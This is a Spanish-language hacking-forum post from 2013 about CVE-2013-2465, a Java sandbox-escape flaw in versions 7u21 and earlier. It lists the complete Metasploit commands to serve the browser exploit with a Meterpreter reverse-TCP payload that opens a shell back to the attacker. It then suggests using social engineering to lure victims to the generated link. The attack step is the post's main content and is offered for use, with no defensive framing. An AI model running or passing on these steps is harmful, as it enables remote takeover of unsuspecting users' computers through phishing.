elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Security Series.XSS. [Cross Site Scripting]


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  CVE-2013-2465
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: CVE-2013-2465  (Leído 2,350 veces)
Stuxnet

Desconectado Desconectado

Mensajes: 29



Ver Perfil WWW
CVE-2013-2465
« en: 2 Septiembre 2013, 03:44 am »


CVE-2013-2465 - Java storeImageArray() Invalid Array Indexing

Este módulo de Metasploit abusa de la Vulnerabilidad matriz indexación no válida en la función storeImageArray() de la función estática para producir una corrupción de memoria y finalmente evadir el Sandbox de Java. La vulnerabilidad afecta a Java versión 7u21 y versiones anteriores.


Explotando CVE-2013-2465 con mestasploit:

Código:
msf > use exploit/multi/browser/java_storeimagearray

msf exploit(java_storeimagearray) > set PAYLOAD java/meterpreter/reverse_tcp

msf exploit(java_storeimagearray) > set LHOST [IP Local]

msf exploit(java_storeimagearray) > set srvhost [IP Local]

msf exploit(java_storeimagearray) > set uripath /

msf exploit(java_storeimagearray) > exploit

Ahora realizamos un poco de Ingeniería Social para enviar la dirección generada por el metasploit para hacer la sesion meterpreter.
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Konami expulsa más de 300 jugadores de Pro Evolution Soccer 2013 - PES 2013 Xbox
Noticias
wolfbcn 0 3,507 Último mensaje 31 Enero 2013, 01:59 am
por wolfbcn
AVG 2013
Seguridad
vipamon 0 4,398 Último mensaje 2 Marzo 2013, 16:12 pm
por vipamon
[Sugerencia] Ehn-Dev 2013 « 1 2 »
Sugerencias y dudas sobre el Foro
0xDani 19 12,349 Último mensaje 8 Junio 2013, 14:45 pm
por OmarHack
Qué esperáis más del E3 2013
Juegos y Consolas
palo_tes 1 3,555 Último mensaje 1 Junio 2013, 21:17 pm
por DickGumshoe
CVE-2013-2460
Bugs y Exploits
Stuxnet 0 2,367 Último mensaje 2 Septiembre 2013, 03:46 am
por Stuxnet
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines